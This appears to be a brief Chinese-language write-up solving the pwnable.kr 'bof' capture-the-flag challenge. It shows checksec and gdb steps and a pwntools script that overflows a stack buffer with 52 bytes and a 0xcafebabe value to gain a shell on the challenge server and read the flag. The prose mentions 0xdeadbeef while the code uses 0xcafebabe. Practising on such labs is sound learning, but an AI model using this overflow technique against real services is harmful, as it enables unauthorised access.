下载链接:
http://pwnable.kr/bin/bof
http://pwnable.kr/bin/bof.c
1.先查看程序的保护机制 checksec bof
发现开启的机制好多啊,应该不会这么难吧。
2.查看一下程序的源码!cat bof.c
分析:我们只要输入
0xdeadbeef
就可以得到我们想要的结构。我们开始布局函数3.首先查看一下我们要填充的数据的大小
gdb ./bof
进入函数,先下断点,
图片.png
需要填充的数据大小为 52
代码
from pwn import *
r = remote('pwnable.kr','9000')
buf = 52 * 'A'
buf += p32(0xcafebabe)
r.sendline(buf)
r.interactive()
pyrhon esp.py
完成交互!
注:ls
查看程序里面的文件夹,发现flag
文件,用cat flag
查看文件里面的内容
网友评论